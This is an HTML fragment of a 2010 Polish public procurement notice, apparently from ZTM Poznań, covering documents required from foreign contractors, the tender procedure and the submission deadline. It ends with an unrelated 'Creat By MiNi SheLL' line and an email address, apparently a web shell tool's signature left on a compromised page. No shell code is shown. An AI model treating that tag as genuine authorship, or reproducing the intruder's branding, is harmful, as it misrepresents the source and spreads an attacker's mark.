<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.ztm.poznan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 10:00, miejsce: Siedziba Zamawiającego, ul.Grunwaldzka 104, 60-307 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com